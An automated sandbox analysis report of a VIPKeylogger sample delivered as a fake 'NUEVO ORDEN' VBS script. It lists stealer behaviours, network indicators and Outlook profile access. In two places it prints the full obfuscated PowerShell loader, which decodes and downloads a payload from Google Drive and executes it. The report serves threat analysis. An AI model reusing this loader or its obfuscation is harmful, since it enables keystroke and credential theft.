Malware Analysis Report

2024-11-13 15:36

Sample ID 241022-t6m1ssvcnb
Target 22102024_1632_22102024_NUEVOORDEN.rar
SHA256 98e999b9e6771e3f4dd54455ece73c011dea3c7f93ae9a75932b2a0a08765f25
Tags
vipkeylogger discovery execution keylogger stealer collection
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

98e999b9e6771e3f4dd54455ece73c011dea3c7f93ae9a75932b2a0a08765f25

Threat Level: Known bad

The file 22102024_1632_22102024_NUEVOORDEN.rar was found to be: Known bad.

Malicious Activity Summary

vipkeylogger discovery execution keylogger stealer collection

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Command and Scripting Interpreter: PowerShell

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

outlook_win_path

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-22 16:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-22 16:40

Reported

2024-10-22 16:42

Platform

win7-20240708-en

Max time kernel

70s

Max time network

72s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.72:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 184.25.193.234:80 www.microsoft.com tcp

Files

memory/2328-4-0x000007FEF66BE000-0x000007FEF66BF000-memory.dmp

memory/2328-5-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/2328-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

memory/2328-7-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-8-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-9-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-11-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-10-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-13-0x000007FEF66BE000-0x000007FEF66BF000-memory.dmp

memory/2328-14-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-16-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7L21292GINPGT8Z2L69A.temp

MD5 18b7db5ead2014a336bbd513a7935a93
SHA1 0e6af9ad08db6a8cb0d6d23ce9792612a65fdcb4
SHA256 95ed4c306fbe11cdeacb31afdce49cd5554142909a95499402bcb0e3ef5c8c37
SHA512 64c1aa0022a528708ce93f241fca2c0f0bb0e1f0d3945d8365b902c473917bdc8c7a34fb3614d4ff8bbc70cce67659d0b0f554edbc26f8524eb86ede1f5b4c60

C:\Users\Admin\AppData\Roaming\Realiaernes60.Svo

MD5 15d4bf8d1435c92eafc43ebdff22b873
SHA1 18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a
SHA256 ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce
SHA512 463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c

memory/2748-20-0x0000000006660000-0x000000000BE28000-memory.dmp

memory/3036-21-0x00000000001E0000-0x0000000001242000-memory.dmp

memory/3036-43-0x00000000001E0000-0x0000000001242000-memory.dmp

memory/3036-44-0x00000000001E0000-0x0000000000228000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-22 16:40

Reported

2024-10-22 16:42

Platform

win10v2004-20241007-en

Max time kernel

146s

Max time network

145s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
